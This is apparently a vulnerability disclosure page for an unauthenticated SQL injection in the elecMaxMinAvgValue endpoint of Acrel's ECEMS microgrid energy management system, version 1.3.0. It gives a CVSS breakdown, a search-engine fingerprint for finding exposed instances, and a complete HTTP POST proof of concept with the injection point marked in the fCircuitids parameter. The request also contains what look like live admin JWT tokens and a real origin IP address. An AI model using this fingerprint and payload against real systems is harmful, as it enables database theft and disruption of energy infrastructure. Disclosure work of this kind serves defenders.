[★‌]The ECEMS/SubstationWEBV2/main/elecMaxMinAvgValue interface of the enterprise microgrid energy efficiency management system of Acrel Electric Co., Ltd. has an unauthorized SQL injection vulnerability.

输入“/”快速插入内容

[★‌]The ECEMS/SubstationWEBV2/main/elecMaxMinAvgValue interface of the enterprise microgrid energy efficiency management system of Acrel Electric Co., Ltd. has an unauthorized SQL injection vulnerability.

4月20日修改

Company：Acrel Electric Co., Ltd.

official website: http://www.acrel.cn/

Product: Enterprise Microgrid Energy Efficiency Management System (ECEMS)

Affected version: 1.3.0

Vulnerability Type: CWE-89 (SQL Injection)

Attack Vector: Network (Remote)

漏洞描述 (Description)：

A critical unauthenticated SQL injection vulnerability was discovered in Acrel Electric Co., Ltd.'s Acrel Enterprise Microgrid Energy Efficiency Management System (ECEMS).​

The vulnerability exists in the /SubstationWEBV2/main/elecMaxMinAvgValue endpoint, which is accessible to remote attackers without any prior authentication or user credentials. Due to a failure to effectively validate and filter user-controllable input, an attacker can transmit malicious SQL commands to the backend database.​

Successful exploitation grants the attacker full unauthorized access to the database, allowing for the theft of sensitive energy infrastructure data, modification of system configurations, and potential disruption of microgrid operations. This poses a significant threat to critical infrastructure security.​

Impact Score (CVSS v3.1):​
◦
Attack Vector (AV): Network (只要能联网就能打)​
◦
Attack Complexity (AC): Low (无需特殊条件)​
◦
Privileges Required (PR): None (未授权)​
◦
User Interaction (UI): None (无需管理员点链接)​
◦
Scope (S): Changed ​
◦
Confidentiality (C): High​
◦
Integrity (I): High ​
◦
Availability (A): High ​

Vulnerability POC

icon_hash="-1291691164" && body="ECEMS"

The login page looks like this.

common.docs_name - LarkCCM_Docs_Menu_Image

POC

代码块

POST /SubstationWEBV2/main/elecMaxMinAvgValue HTTP/1.1​
Host: ​
Content-Length: 241​
Response-Msg: chinese​
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjoid2ViIiwiZXhwIjoxNzc0NjAzMjEzLCJ1c2VybmFtZSI6ImFkbWluIn0.SsRUyRFwhjlXWVjJHpaR6WlLrPwyZKLGcfcd2LgKP68​
Api-Version: 2.0.0​
Access-Control-Allow-Origin: *​
projectType: 4​
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36​
Accept: application/json, text/plain, */*​
Content-Type: application/x-www-form-urlencoded;charset=UTF-8​
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjoid2ViIiwiZXhwIjoxNzc0NTk3MzQwLCJ1c2VybmFtZSI6ImFkbWluIn0.pe1lS-eVBJWcuNcxwLntrg4zBAY2IPWrRQJ0L2VbR4I​
Origin: http://101.37.255.216​
Accept-Encoding: gzip, deflate, br​
Accept-Language: zh-CN,zh;q=0.9​
Cookie: language=zh-CN​
Connection: keep-alive​
 ​
fSubid=10100001&fCircuitids=101000010002-101000010003-101000010004-101000010005-101000010006-101000010007-101000010008-101000010009-101000010010-101000010011-101000010012-101000010013-101000010014*&time=2026-03-26&selectParam=P&selectType=day​

[★‌]The ECEMS/SubstationWEBV2/main/elecMaxMinAvgValue interface of the enterprise microgrid energy efficiency management system of Acrel Electric Co., Ltd. has an unauthorized SQL injection vulnerability.​

[★‌]The ECEMS/SubstationWEBV2/main/elecMaxMinAvgValue interface of the enterprise microgrid energy efficiency management system of Acrel Electric Co., Ltd. has an unauthorized SQL injection vulnerability.